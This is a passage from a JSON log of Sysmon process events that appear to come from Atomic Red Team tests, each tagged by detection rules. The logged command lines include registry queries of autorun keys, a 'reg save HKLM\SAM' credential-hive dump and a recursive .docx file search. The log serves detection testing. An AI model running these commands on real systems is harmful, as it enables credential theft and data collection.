HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00107C693100","ParentProcessId":1740,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010C86B3100","ProcessId":644,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.931"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3702,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.937862Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010056E3100","ProcessId":4220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.956"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3703,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.975133Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010056E3100","ParentProcessId":4220,"ProcessGuid":"747F3D96-D87C-5D31-0000-001057703100","ProcessId":6620,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.986"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3704,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.990533Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-001090723100","ProcessId":196,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.019"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3705,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.036329Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-001090723100","ParentProcessId":196,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010E2743100","ProcessId":3172,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.054"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3706,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.059631Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-00102B773100","ProcessId":2148,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.113"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3707,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.147861Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-00102B773100","ParentProcessId":2148,"ProcessGuid":"747F3D96-D87D-5D31-0000-00107D793100","ProcessId":1472,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.169"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3708,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.175813Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010B37B3100","ProcessId":3616,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.209"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3709,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.225776Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010B37B3100","ParentProcessId":3616,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010057E3100","ProcessId":1340,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.246"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3710,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.251689Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-00103B803100","ParentProcessId":324,"ProcessGuid":"747F3D96-D87D-5D31-0000-00108D823100","ProcessId":1224,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.327"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3712,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.331942Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010CA843100","ParentProcessId":3900,"ProcessGuid":"747F3D96-D87D-5D31-0000-00101C873100","ProcessId":3412,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.383"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3714,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.392501Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010FA8A3100","ProcessId":3868,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.541"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3715,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.559318Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010FA8A3100","ParentProcessId":3868,"ProcessGuid":"747F3D96-D87D-5D31-0000-00104C8D3100","ProcessId":6536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.568"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3716,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.572021Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\SAM sam.hive\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D885-5D31-0000-00107F1A3200","ProcessId":2832,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:41.646"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3721,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:41.660271Z"}},"Version":5}}}},{"detection":["Automated Collection Command Prompt"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D88F-5D31-0000-0010BD353200","ProcessId":2780,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:51.971"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3724,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:51.996250Z"}},"Version":5}}}},{"detection":["Automated Collection Command Prompt"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /S /D /c\" dir c: /b /s .docx \"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D88F-5D31-0000-0010BD353200","ParentProcessId":2780,"ProcessGuid":"747F3D96-D890-5D31-0000-001012383200","ProcessId":608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 